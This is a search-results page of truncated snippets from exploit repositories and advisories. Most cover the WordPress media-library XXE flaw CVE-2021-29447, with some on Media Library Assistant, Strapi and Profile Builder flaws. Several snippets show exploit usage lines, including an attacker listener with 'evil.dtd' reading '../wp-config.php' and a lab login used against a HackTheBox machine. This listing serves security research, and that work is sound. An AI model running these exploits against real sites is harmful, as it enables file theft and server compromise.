1103 matches found
CVE-2021-29447
CVE-2021-29447 POC to exploit WordPress 5.6-5.7 PHP 8+ Authenticated XXE Injection. More about this CVE here 示例 示例用法针对 HackTheBox 的 MetaTwo 机器,该机器托管了一个 WordPress 网站,其媒体库容易受到 XXE 注入攻击。 root@kitploit: python lfi.py -u manager -p partylikearockstar -t metapress.htb -lh 10.10.XX.XX -lp 8081 -w...
CVE-2022-32114
Strapi v4.1.12 漏洞说明: Strapi v4.1.12 的“添加新资产”(Add New Assets)功能中存在一个不受限制的文件上传漏洞,攻击者可通过特制文件执行任意代码 攻击向量: 上传包含恶意内容的文件后,当用户打开该文件的链接时,其中包含的恶意代码将被执行。 Payload : https://github.com/bypazs/GrimTheRipper/blob/main/GrimTheRipperTeam.pdf 测试环境: 1. Strapi 版本 4.1.12 2. Google Chrome 版本 102.0.5005.61(正式版)(64 位)...
Project-Project-Chimera-Exploiting-a-Modern-WordPress-XXE-to-Pillage-Secrets-
项目目标:演示针对易受攻击的WordPress安装的完整攻击链,利用CVE-2021-29447(媒体库中的XXE)实现远程代码执行并完全攻陷系统。 阶段1:侦察与信息收集 使用Nmap进行网络扫描: bash 快速SYN扫描发现开放端口 nmap -sS -T4 10.201.3.95 详细的版本和脚本扫描 nmap -sV -sC -p22,80,3306 10.201.3.95 -oA initialscan 结果: text PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 80/tcp open ht...
CVE-2021-29447
CVE-2021-29447 WordPress 5.6-5.7 - 认证(作者及以上)XXE攻击 https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/ 用法: -l LHOST 示例: 127.0.0.1 -n NAME 示例: payload.wav -dn DTDNAME 示例: evil.dtd -r READ 示例: ../wp-config.php evil-wav-dtd-xxe.py: 错误: 需要以下参数: -l/--lhost, -n/--name, -dn/--dtd,...
blind-xxe-controller-CVE-2021-29447
盲 XXE 控制器 我在完成 HackTheBox 中的 metatwo 机器时制作了这个控制器,用于利用 CVE-2021-29447,这是 WordPress 媒体库中的一个 XXE 漏洞,影响版本 5.7、5.6.2、5.6.1、5.6、5.0.11。该漏洞允许具有上传媒体库权限的已认证用户上传恶意 wav 文件,从而导致远程任意文件读取和服务器端请求伪造(SSRF)。 要利用这些漏洞,需要多个步骤才能完成一次成功的攻击。由于解析后的 iXML 元数据不会返回给用户,因此我们需要一个盲 XXE 载荷。这可以通过包含由攻击者控制的外部文档类型定义(DTD)来实现,并且我们需要创建恶意...
WordPress Media Library Assistant <= 3.34 - SQL Injection
David Lingren Media Library Assistant = 3.34 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input. id: CVE-2026-34885 info: name: WordPress Media Library Assistant = 3.34 -...
Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion
Media Library Assistant plugin for WordPress before 2.82 contains a local file inclusion caused by unsanitized mlagallery link parameter, letting attackers include arbitrary local files, exploit requires access to the vulnerable link. id: CVE-2020-11732 info: name: Media Library Assistant 2.82 -...
Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
A vulnerability in the Wordpress Media-Library-Assistant plugins in version 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. id: CVE-2023-4634 info: name: Media Library Assistant 3.09 - Remote Code Execution/Local File Inclusion...
CVE-2023-4634-PoC
CVE-2023-4634 - WordPress 插件 Media Library Assistant 中的 RCE 漏洞 1. 构建并启动环境 root@kitploit: cd Stand docker-compose up --build -d 2. 等待服务启动(60秒) root@kitploit: sleep 60 curl -I http://localhost:8080 3. 运行漏洞扫描 root@kitploit: cd ../PoC/src python3 scanner.py http://localhost:8080 4. 手动测试 RCE...
CVE-2021-29447
CVE-2021-29447 - WordPress XXE 漏洞利用 描述 该存储库包含一个针对 CVE-2021-29447 的 exploit,这是 WordPress 5.7.0 及更早版本中存在的一个 XXE(XML 外部实体)漏洞。该漏洞存在于处理 WAV 文件的媒体库中,允许攻击者读取服务器上的任意文件。 要求 Bash Python 3 Docker 和 Docker Compose(用于搭建测试环境) 存在漏洞的 WordPress 服务器(5.7.0 或更低版本) 文件 文件| 描述 ---|--- CVE-2021-29447.sh| 生成恶意 WAV payloa...
CVE-2023-4634
CVE-2023-4634 WordPress Media-Library 插件 3.10 的 RCE 利用 CVE-2023-4634 信息 Patrowl 在 Wordpress 插件 Media-Librairy-Assistant 版本 3.10 中发现了一个未认证的 RCE 漏洞。 该利用并非易事,只需要按照下方说明进行简单设置即可。 完整的漏洞发现与利用可参考我们的博客:https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ 利用前提 已安装 Wordpress(所有版本均可)...
wordpress-cve-2021-29447
WordPress CVE-2021-29447 漏洞利用 利用 WordPress 媒体库 XML 中需认证的外部实体注入(XXE)漏洞来窃取文件。 该漏洞已在 WordPress 5.7.1 中修复。 需要有效的 WordPress 凭据才能与媒体库交互。 使用方法 root@kitploit: python3 wordpress-cve-2021-29447.py -l http://LOCALIP:PORT -r http://WORDPRESSURL -u USERNAME -p PASSWORD 脚本将询问文件路径并返回所请求的文件。 致谢 灵感来自 David Utón...
cve-2021-29447_auto-script
CVE-2021-29447:WordPress 媒体库 XXE 漏洞 本仓库详细介绍了 CVE-2021-29447 漏洞,这是 WordPress 中一个严重的安全缺陷,允许攻击者通过媒体库进行经过身份验证的 XML 外部实体(XXE)攻击。它还提供了一个自动化脚本,用于演示概念验证(PoC)。 📌 漏洞概述 该漏洞存在于 WordPress 对上传音频文件元数据的处理中。具体如下: 根本原因:WordPress 使用 getID3 库解析 WAV 等媒体文件的元数据。WAV 文件可以包含一个名为 iXML 的 XML 数据块。攻击者可以构造一个包含恶意 XML 内容的 WAV...
CVE-2021-29447-PoC
CVE-2021-29447 概念验证 root@kitploit: ╔═╗╦ ╦╔═╗ ║ ╚╗╔╝║╣────2021-29447 ╚═╝ ╚╝ ╚═╝ Written By Isa Ebrahim - 0xRar on January, 2023 ═══════════════════════════════════════════════════════════════════════════ 标题: Wordpress 媒体库中的 XML 解析问题导致 XXE 受影响版本: Wordpress 5.6 - 5.7 已修复版本: Wordpress 5.7.1 安装版本: PHP...
CVE-2021-29447
CVE-2021-29447 PoC 本仓库包含针对 CVE-2021-29447 漏洞的概念验证(PoC)漏洞利用工具,该漏洞影响使用 PHP 8 的 WordPress 5.6 和 5.7 。该工具演示了攻击者如何在具备文件上传能力的情况下,利用媒体库中的 XML 解析漏洞,导致 XXE(XML 外部实体)攻击,并进而从目标环境中窃取本地文件。 ⚠️ 免责声明 本项目仅用于教育、研究和授权安全测试目的 。 请勿在您不拥有或未经明确许可的系统上使用此代码。 作者对任何损害或滥用不承担任何责任 。 使用方法 root@kitploit:...
CVE-2021-29447
WordPress XXE Vulnerability : CVE-2021-29447 A user with the ability to upload a malicious WAVE file like an Author can exploit an XML parsing issue in the Media Library in WordPress leading to XXE attacks and that could lead to file system disclosure Vulnerable code XML External Entity XXE...
CVE-2026-76548
The User Profile Builder WordPress plugin before 4.0.1 does not properly restrict its front-end file upload feature, granting unauthenticated visitors capabilities reserved to privileged roles. This allows them to list the site's media library and to modify unpublished posts, pages and media item...
CVE-2026-76548
CVE-2026-76548 affects the User Profile Builder WordPress plugin in versions before 4.0.1 . The front-end file upload feature fails to properly restrict access, granting unauthenticated visitors capabilities normally reserved for privileged roles. This allows attackers to list the site's media li...
EUVD-2026-68052
The User Profile Builder WordPress plugin before 4.0.1 does not properly restrict its front-end file upload feature, granting unauthenticated visitors capabilities reserved to privileged roles. This allows them to list the site's media library and to modify unpublished posts, pages and media item...
CVE-2026-76548 Profile Builder < 4.0.1 - Unauthenticated Unpublished Content and Media Modification via Front-End Upload Auth Bypass
The User Profile Builder WordPress plugin before 4.0.1 does not properly restrict its front-end file upload feature, granting unauthenticated visitors capabilities reserved to privileged roles. This allows them to list the site's media library and to modify unpublished posts, pages and media item...